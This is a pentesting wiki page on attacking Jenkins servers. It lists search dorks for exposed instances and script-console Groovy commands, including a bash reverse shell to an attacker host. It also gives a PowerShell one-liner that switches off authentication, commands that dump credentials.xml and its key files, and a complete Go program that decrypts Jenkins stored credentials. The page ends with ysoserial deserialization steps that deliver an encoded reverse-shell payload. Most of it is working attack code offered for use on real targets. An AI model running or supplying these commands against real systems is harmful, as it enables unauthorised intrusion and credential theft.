WebApp

From BHaFSec Pentesting Notes Wiki

Jenkins / Hudson

Google Dorks:
Public instances: intitle:"Dashboard [Jenkins]"
Public instances where anonymous users already have admin (the "Manage Jenkins" link is visible without logging in): intitle:"Dashboard [Jenkins]" intext:"Manage Jenkins"


Linux Based
http://<Target-jenkins-url>/script (or /jenkins/script when Jenkins is deployed under that context path). The script console runs Groovy inside the master JVM and needs admin rights; everything below executes as the Jenkins service user.

// one-off commands: String.execute() starts the program directly, no shell involved
println "uname -a".execute().text
println "ls".execute().text

// same thing, streaming the output line by line
def process = "ls".execute()
process.text.eachLine { println it }

// reverse shell: the redirections are shell syntax, so the command must go through
// "bash -c"; "bash -i >& /dev/tcp/...".execute() on its own hands ">&" and the
// /dev/tcp path to bash as plain arguments and never connects back.
// (new variable name: a script cannot declare "process" twice)
def shell = ["bash", "-c", "bash -i >& /dev/tcp/ATTACKERIP/443 0>&1"].execute()
shell.waitFor()   // blocks the request until the shell exits; drop it to get the console back while the shell keeps running


Windows Based
Remove Security
Run it as a build step on the master (the step then executes as the Jenkins service account, which can write config.xml) and restart the Jenkins service: security is removed from the web console and anyone browsing to the URL has admin rights. C:\test\config.xml stands for the config.xml in JENKINS_HOME (C:\Program Files (x86)\Jenkins\config.xml on the default Windows install used in the commands further down). The element is <useSecurity>; XML is case-sensitive, so a mismatched closing tag leaves config.xml unparseable instead of disabling security.

powershell "(cat 'C:\test\config.xml') -replace '<useSecurity>true</useSecurity>','<useSecurity>false</useSecurity>' | Set-Content 'C:\test\config.xml'"

Decrypt Credentials. The secrets in credentials.xml are encrypted with a key Jenkins derives from two files in JENKINS_HOME\secrets: master.key (a hex string) protects hudson.util.Secret, and hudson.util.Secret holds the credential key. Dump both as raw bytes so nothing is lost to text conversion (-encoding byte is Windows PowerShell syntax; PowerShell 7 uses -AsByteStream instead):

powershell -c "cat 'C:\Program Files (x86)\Jenkins\credentials.xml'"
powershell -c "cat -encoding byte 'C:\Program Files (x86)\Jenkins\secrets\master.key'"
powershell -c "cat -encoding byte -path 'C:\Program Files (x86)\Jenkins\secrets\hudson.util.Secret'"

Save the byte dumps as text files, then use nishang's TexttoExe.ps1 to turn the text back into the binary files:

PS C:\nishang> . C:\nishang\Utility\TexttoExe.ps1
PS C:\nishang> TexttoEXE -FileName C:\test\hudson.util.txt -EXE C:\test\hudson.util.secret
PS C:\nishang> TexttoEXE -FileName C:\test\master.txt -EXE C:\test\master.key
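
Worked example of the decryption step, added here (it is not from the original page, Jenkins or nishang): a Go program that reproduces Jenkins's own scheme with the standard library only. master.key is hashed with SHA-256 and the first 16 bytes become the AES-128 key that decrypts hudson.util.Secret (AES/ECB, PKCS5 padding, with a ::::MAGIC:::: suffix that confirms the key); the first 16 bytes of that decrypted payload are the key for the values in credentials.xml, which come either as bare base64 (legacy AES/ECB with the same MAGIC suffix) or as {base64} (newer AES/CBC: a 0x01 version byte, two big-endian lengths and the IV in front of the ciphertext). The Fixture function constructs sample files and values so the program runs offline; the file contents, key bytes and plaintexts in it are made up, not taken from any instance.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha256"
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
	"strings"
)

// Jenkins appends this to each plaintext before encrypting; finding it again after decryption is the key check.
const magic = "::::MAGIC::::"

// Key protecting hudson.util.Secret: SHA-256 of the trimmed hex string in master.key, first 16 bytes.
func masterKeyToAES(masterKey string) []byte { s := sha256.Sum256([]byte(strings.TrimSpace(masterKey))); return s[:16] }

// AES/ECB block by block, op being block.Encrypt or block.Decrypt (what Jenkins's plain "AES" cipher does).
func ecb(op func(dst, src []byte), data []byte) []byte {
	out := make([]byte, len(data))
	for i := 0; i < len(data); i += aes.BlockSize {
		op(out[i:], data[i:])
	}
	return out
}

func pkcs5Pad(b []byte) []byte { n := aes.BlockSize - len(b)%aes.BlockSize; return append(b, bytes.Repeat([]byte{byte(n)}, n)...) }
func pkcs5Unpad(b []byte) ([]byte, error) {
	n := len(b)
	if n == 0 || b[n-1] == 0 || int(b[n-1]) > aes.BlockSize || int(b[n-1]) > n {
		return nil, errors.New("bad PKCS5 padding")
	}
	return b[:n-int(b[n-1])], nil
}

// ecbOpen decrypts a legacy AES/ECB blob and strips the padding and the MAGIC suffix.
func ecbOpen(block cipher.Block, data []byte) ([]byte, error) {
	if len(data) == 0 || len(data)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext is not whole AES blocks")
	}
	plain, err := pkcs5Unpad(ecb(block.Decrypt, data))
	if err != nil || !bytes.HasSuffix(plain, []byte(magic)) {
		return nil, errors.New("MAGIC suffix missing: wrong key?")
	}
	return bytes.TrimSuffix(plain, []byte(magic)), nil
}

// SecretKey: master.key + hudson.util.Secret -> the 16-byte credential key (first 16 bytes of the 256-byte payload stored there).
func SecretKey(masterKey string, hudsonUtilSecret []byte) ([]byte, error) {
	block, _ := aes.NewCipher(masterKeyToAES(masterKey)) // 16-byte key, cannot fail
	payload, err := ecbOpen(block, hudsonUtilSecret)
	if err != nil || len(payload) < 16 {
		return nil, errors.New("hudson.util.Secret did not decrypt: wrong master.key?")
	}
	return payload[:16], nil
}

// Decrypt handles both credentials.xml encodings: "{base64}" = byte 0x01, IV length and data length
// as big-endian int32, IV, AES/CBC ciphertext; bare base64 = legacy AES/ECB of plaintext + MAGIC.
func Decrypt(key []byte, value string) (string, error) {
	block, errKey := aes.NewCipher(key)
	raw, errB64 := base64.StdEncoding.DecodeString(strings.Trim(value, "{}"))
	if errKey != nil || errB64 != nil {
		return "", errors.New("bad key length or base64")
	}
	if !strings.HasPrefix(value, "{") {
		plain, err := ecbOpen(block, raw)
		return string(plain), err
	}
	if len(raw) < 9 || raw[0] != 1 || binary.BigEndian.Uint32(raw[1:5]) != aes.BlockSize ||
		int(binary.BigEndian.Uint32(raw[5:9])) != len(raw)-9-aes.BlockSize || (len(raw)-9)%aes.BlockSize != 0 {
		return "", errors.New("malformed payload")
	}
	plain := make([]byte, len(raw)-9-aes.BlockSize)
	cipher.NewCBCDecrypter(block, raw[9:9+aes.BlockSize]).CryptBlocks(plain, raw[9+aes.BlockSize:])
	plain, err := pkcs5Unpad(plain)
	return string(plain), err
}

// Fixture is constructed sample data, not files from a real instance: a master.key, the hudson.util.Secret it protects, and one credential per format.
func Fixture() (masterKey string, hudsonUtilSecret []byte, legacy, modern string) {
	masterKey = strings.Repeat("ab", 128) // Jenkins writes 128 random bytes as hex
	mk, _ := aes.NewCipher(masterKeyToAES(masterKey))
	payload := bytes.Repeat([]byte{0x42}, 256) // Jenkins keeps 256 random bytes here
	hudsonUtilSecret = ecb(mk.Encrypt, pkcs5Pad(append(payload, magic...)))
	key, _ := aes.NewCipher(payload[:16])
	legacy = base64.StdEncoding.EncodeToString(ecb(key.Encrypt, pkcs5Pad([]byte("s3cret"+magic))))
	iv, data := bytes.Repeat([]byte{7}, aes.BlockSize), pkcs5Pad([]byte("hunter2"))
	ct := make([]byte, len(data))
	cipher.NewCBCEncrypter(key, iv).CryptBlocks(ct, data)
	hdr := []byte{1, 0, 0, 0, byte(len(iv)), 0, 0, 0, byte(len(ct))} // both lengths < 256, so one byte each
	modern = "{" + base64.StdEncoding.EncodeToString(append(append(hdr, iv...), ct...)) + "}"
	return
}

func main() {
	masterKey, secretFile, legacy, modern := Fixture()
	key, _ := SecretKey(masterKey, secretFile)
	fmt.Println(Decrypt(key, legacy))
	fmt.Println(Decrypt(key, modern))
}
```

Against a real target, give SecretKey the text of master.key and the bytes rebuilt from the hudson.util.Secret dump above, then pass each <password>, <privateKey> or <secret> value from credentials.xml to Decrypt. A MAGIC error means the secrets files and the credentials.xml came from different JENKINS_HOME directories, or the dump was altered by text conversion.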


Unserialization
Download ysoserial and build the payload with it. The command is run through Runtime.exec() without a shell, so pipes and redirects do not work; an encoded PowerShell command sidesteps that. The CommonsCollections1 gadget chain needs Apache Commons Collections 3.x on the target's classpath, which the affected Jenkins versions bundled:

java -jar ysoserial-0.0.2-all.jar CommonsCollections1 'powershell.exe -e <encoded_reverse_shell>' > payload.out

Download JavaUnserializeExploits and send the payload. The deserialization happens on the Jenkins CLI listener, a separate TCP port advertised in the X-Jenkins-CLI-Port header of the web root, not in the HTTP handler; check which of the two ports the script expects as <port>:

python jenkins_exploit.py <target> <port> payload.out

An easier Python script to do this can be found here; a video is here.

Weblogic

JBOSS

WebSphere

OpenNMS